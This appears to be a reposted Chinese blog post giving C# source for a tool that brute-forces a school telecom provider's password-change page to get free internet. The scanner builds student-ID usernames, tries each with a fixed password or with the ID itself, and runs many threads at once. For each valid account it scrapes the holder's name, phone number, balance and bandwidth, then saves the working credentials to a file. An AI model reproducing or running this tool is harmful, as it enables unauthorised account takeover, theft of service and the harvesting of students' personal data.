c#实现对登陆信息的反馈,实现对网站登录密码的扫描
2013-09-29 17:10
417 查看
最近发现我们学校的电信上网改密码的页面很简单,没有验证码,于是我就很好奇,后来发现原来是我们学校的电信的那个改密码的页面有漏洞于是就可以通过扫描账号免费上网
原理就是对修改密码的页面进行POST请求
如果密码账号正确就返回200
下面是C#的网络操作类
using System;
using System.IO;
using System.Net;
using System.Text;
using System.Collections.Generic;
using System.Text.RegularExpressions;
namespace scan
{
public class zzHttp
{
private const string sContentType = "application/x-www-form-urlencoded";
private const string sUserAgent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";
public static string Send(string data, string url)
{
return Send(Encoding.GetEncoding("UTF-8").GetBytes(data), url);
}
public static string Send(byte[] data, string url)
{
Stream responseStream;
HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest;
if (request == null)
{
throw new ApplicationException(string.Format("Invalid url string: {0}", url));
}
// request.UserAgent = sUserAgent;
request.ContentType = sContentType;
request.Method = "POST";
request.ContentLength = data.Length;
Stream requestStream = request.GetRequestStream();
requestStream.Write(data, 0, data.Length);
requestStream.Close();
try
{
responseStream = request.GetResponse().GetResponseStream();
}
catch (Exception exception)
{
throw exception;
}
string str = string.Empty;
using (StreamReader reader = new StreamReader(responseStream, Encoding.GetEncoding("UTF-8")))
{
str = reader.ReadToEnd();
}
responseStream.Close();
return str;
}
#region 同步通过POST方式发送数据
/// <summary>
/// 通过POST方式发送数据
/// </summary>
/// <param name="Url">url</param>
/// <param name="postDataStr">Post数据</param>
/// <param name="cookie">Cookie容器</param>
/// <returns></returns>
public string SendDataByPost(string Url, string postDataStr, ref CookieContainer cookie)
{
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(Url);
if (cookie.Count == 0)
{
request.CookieContainer = new CookieContainer();
cookie = request.CookieContainer;
}
else
{
request.CookieContainer = cookie;
}
request.Method = "POST";
request.ContentType = "application/x-www-form-urlencoded";
request.ContentLength = postDataStr.Length;
//request.Timeout = 1000;
//request.ReadWriteTimeout = 3000;
Stream myRequestStream = request.GetRequestStream();
StreamWriter myStreamWriter = new StreamWriter(myRequestStream, Encoding.GetEncoding("gb2312"));
myStreamWriter.Write(postDataStr);
myStreamWriter.Close();
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
Stream myResponseStream = response.GetResponseStream();
StreamReader myStreamReader = new StreamReader(myResponseStream, Encoding.GetEncoding("gb2312"));
string retString = myStreamReader.ReadToEnd();
myStreamReader.Close();
myResponseStream.Close();
return retString;
}
#endregion
#region 同步通过GET方式发送数据
/// <summary>
/// 通过GET方式发送数据
/// </summary>
/// <param name="Url">url</param>
/// <param name="postDataStr">GET数据</param>
/// <param name="cookie">Cookie容器</param>
/// <returns></returns>
public string SendDataByGET(string Url, string postDataStr, ref CookieContainer cookie)
{
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(Url + (postDataStr == "" ? "" : "?") + postDataStr);
if (cookie.Count == 0)
{
request.CookieContainer = new CookieContainer();
cookie = request.CookieContainer;
}
else
{
request.CookieContainer = cookie;
}
request.Method = "GET";
request.ContentType = "text/html;charset=UTF-8";
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
Stream myResponseStream = response.GetResponseStream();
StreamReader myStreamReader = new StreamReader(myResponseStream, Encoding.GetEncoding("utf-8"));
string retString = myStreamReader.ReadToEnd();
myStreamReader.Close();
myResponseStream.Close();
return retString;
}
#endregion
public string zzget(string Url,string getdata, string type)
{
try
{
System.Net.WebRequest wReq = System.Net.WebRequest.Create(Url + (getdata == "" ? "" : "?") + getdata);
// Get the response instance.
wReq.Method = "GET";
wReq.ContentType = "text/html;charset=UTF-8";
System.Net.WebResponse wResp = wReq.GetResponse();
System.IO.Stream respStream = wResp.GetResponseStream();
// Dim reader As StreamReader = New StreamReader(respStream)
using (System.IO.StreamReader reader = new System.IO.StreamReader(respStream, Encoding.GetEncoding(type)))
{
return reader.ReadToEnd();
}
}
catch (System.Exception ex)
{
//errorMsg = ex.Message;
}
return "";
}
///<summary>
///采用post发送请求
///</summary>
///<param name="URL">url地址</param>
///<param name="strPostdata">发送的数据</param>
///<returns></returns>
public string zzpost(string URL, IDictionary<string, Object> strPostdata, string strEncoding)
{
//IDictionary<string, Object> idc = new Dictionary<string, object>();
StringBuilder data = new StringBuilder();
foreach (KeyValuePair<string, Object> param in strPostdata)
{
data.Append(param.Key).Append("=");
data.Append(param.Value.ToString());
data.Append("&");
}
data.Remove(data.Length- 1,1);
Encoding encoding = Encoding.Default;
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(URL);
request.CookieContainer = new CookieContainer();//少了这句就不能登录
request.Method = "post";
request.Accept = "text/html, application/xhtml+xml, */*";
request.ContentType = "application/x-www-form-urlencoded";
byte[] buffer = encoding.GetBytes(data.ToString());
request.ContentLength = buffer.Length;
request.GetRequestStream().Write(buffer, 0, buffer.Length);
/*
request.ContentLength = data.Length;
Stream myRequestStream = request.GetRequestStream();
StreamWriter myStreamWriter = new StreamWriter(myRequestStream, Encoding.GetEncoding("gb2312"));
myStreamWriter.Write(data);
myStreamWriter.Close();
*/
HttpWebResponse response = (HttpWebResponse)request.GetResponse();
using (StreamReader reader = new StreamReader(response.GetResponseStream(), System.Text.Encoding.GetEncoding(strEncoding)))
{
return reader.ReadToEnd();
}
}
/// <summary>
/// 清除文本中Html的标签
/// </summary>
/// <param name="Content"></param>
/// <returns></returns>
public static string ClearHtml(string Content)
{
Content = Zxj_ReplaceHtml("&#[^>]*;", "", Content);
Content = Zxj_ReplaceHtml("</?marquee[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?object[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?param[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?embed[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?table[^>]*>", "", Content);
Content = Zxj_ReplaceHtml(" ", "", Content);
Content = Zxj_ReplaceHtml("</?tr[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?th[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?p[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?a[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?img[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?tbody[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?li[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?span[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?div[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?th[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?td[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?script[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("(javascript|jscript|vbscript|vbs):", "", Content);
Content = Zxj_ReplaceHtml("on(mouse|exit|error|click|key)", "", Content);
Content = Zxj_ReplaceHtml("<\\?xml[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("<\\/?[a-z]+:[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?font[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?b[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?u[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?i[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?strong[^>]*>", "", Content);
Content = Zxj_ReplaceHtml("</?strong[^>]*>", "", Content);
Content = Zxj_ReplaceHtml(" ", "", Content);
Regex r = new Regex(@"\s+");
Content = r.Replace(Content, "");
Content.Trim();
string clearHtml = Content;
return clearHtml;
}
/// <summary>
/// 清除文本中的Html标签
/// </summary>
/// <param name="patrn">要替换的标签正则表达式</param>
/// <param name="strRep">替换为的内容</param>
/// <param name="content">要替换的内容</param>
/// <returns></returns>
private static string Zxj_ReplaceHtml(string patrn, string strRep, string content)
{
if (string.IsNullOrEmpty(content))
{
content = "";
}
Regex rgEx = new Regex(patrn, RegexOptions.IgnoreCase);
string strTxt = rgEx.Replace(content, strRep);
return strTxt;
}
}
}
然后对某个网址进行post请求
//开始扫描
public void scan()
{
bool flag = false;
object[] V= GetValue();
string no = V[0].ToString();
string userpass = V[1].ToString();
int cnum = int.Parse(V[2].ToString());
int snum = int.Parse(V[3].ToString());
if (userpass.Length <= 0)
flag = true;
zzHttp http = new zzHttp();
string url = "这儿填你需要的网址";
//统计线程数
ThreadPool.QueueUserWorkItem(new WaitCallback(CountProcess));
//检查线程是否结束
rhw = ThreadPool.RegisterWaitForSingleObject(new AutoResetEvent(false), this.CheckThreadPool, null, 1000, false);
int begin = int.Parse(beginclass.Text);
int end = int.Parse(endclass.Text);
for (int m = begin; m <= end; m++)//扫描不同年级
{
for (int j = 1; j <= cnum; j++)
{
string tmp = "";
if (j < 10)
tmp = m + no + "0" + j;
else
tmp = m + no + j;
for (int i = 1; i <= snum; i++)
{
string tempstuno = "";//构造出来的学号
if (i < 10)
tempstuno = tmp + "0" + i;
else
tempstuno = tmp + i;
AddAccountMessage( tempstuno + "<正在检查...>");
if (flag)
{
scanuser s = new scanuser(http, url, tempstuno, tempstuno, this);
// threadReceive = new Thread(new ThreadStart(s.login));
ThreadPool.QueueUserWorkItem(new WaitCallback(s.login));
}
else
{
scanuser s = new scanuser(http, url, tempstuno, userpass, this);
//threadReceive = new Thread(new ThreadStart(s.login));
ThreadPool.QueueUserWorkItem(new WaitCallback(s.login));
}
//threadReceive.Start();
}
}
}
}
下面是扫描类
//扫描类
class scanuser
{
public Form1 F = null;
zzHttp http;
string url;
string username;
string userpass;
//判断一个用户的用户名和密码是否正确的
public scanuser(zzHttp http, string url, string username, string userpass, Form1 F)
{
this.F = F;
this.http = http;
this.username = username;
this.userpass = userpass;
this.url = url;
}
//登录
public void login(Object stateInfo)
{
string postdata = String.Format("name={0}&password={1}", username, userpass);
CookieContainer cookie = new CookieContainer();
try
{
string ret = http.SendDataByPost(url, postdata, ref cookie);
if (ret.Contains("客户名称"))
{
ret = zzHttp.ClearHtml(ret);//去掉多余的html
//获取姓名
int pos = ret.LastIndexOf("客户名称");
string name = ret.Substring(pos + 5, 2);//两个字姓名
string tmp = ret.Substring(pos + 7, 1);//第三个字
if (tmp != "联")
name = name + tmp;
//获取手机号
pos = ret.LastIndexOf("联系电话");
string tel = ret.Substring(pos + 5, 11);
Regex regex = new Regex("^1\\d{10}$");
if (!regex.IsMatch(tel))
tel = "无";
//获取预存款
pos = ret.LastIndexOf("预存款余额(RMB)");
string money = ret.Substring(pos + 11,5);
tmp = ret.Substring(pos+16,1);
if (tmp != "<")
money += tmp;
//获取带宽 先判断有没有备注
string width = "2M";
if (ret.Contains("独享"))
{
if (ret.Contains("4M"))
width = "4M";
else if (ret.Contains("6M"))
width = "6M";
else if (ret.Contains("8M"))
width = "8M";
else if (ret.Contains("12M"))
width = "12M";
}
if (ret.Contains("有效"))
{
//F.AddScanMessage("\n");
F.Setcolor(Color.Green);
F.AddScanMessage(username + "<有效," + name + "," + tel + ",$=" + money + "," + width + ">");
write_txt(username,userpass,name,width);
}
else if (ret.Contains("停机"))
{
//F.AddScanMessage("\n");
F.Setcolor(Color.Red);
F.AddScanMessage(username + "<停机,"+ name + "," + tel + ">");
}
}
}catch(Exception ex)
{
F.Setcolor(Color.Yellow);
F.AddScanMessage("网络故障..."+ex.Message);
}
}
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- c#实现对登陆信息的反馈,实现对网站登录密码的扫描
- C#使用WebClient登录网站并抓取登录后的网页信息实现方法
- c# 实现网页上用户自动登陆|asp.net 模拟网站登录
- c# 实现网页上用户自动登陆|asp.net 模拟网站登录
- 用C#实现MD5算法类,用于对密码及重要信息进行加密
- C#实现支持单点登录的一个存储用户信息的类
- C#实现网站登录
- C#实现通过HttpWebRequest发送POST请求实现网站自动登陆
- 网站登录密码忘记后,通过向手机发送验证码实现找回密码的实现方法
- 网站登录密码忘记后,通过向手机发送验证码实现找回密码的实现方法
- 使用C#实现网站用户登录
- C#三种模拟自动登录和提交POST信息的实现方法
- C#三种模拟自动登录和提交POST信息的实现方法
- 用c#开发微信 (20) 微信登录网站 - 扫描二维码登录
- ASP.net(C#)从其他网站抓取内容并截取有用信息的实现代码
- C#-WinForm登录窗体实现记住密码的功能(仿QQ实现)
- C#三种模拟自动登录和提交POST信息的实现方法
- 【转】详解抓取网站,模拟登陆,抓取动态网页的原理和实现(Python,C#等)
- C#网站实现QQ第三方登陆# C#快速开发教程
- C#三种模拟自动登录和提交POST信息的实现方法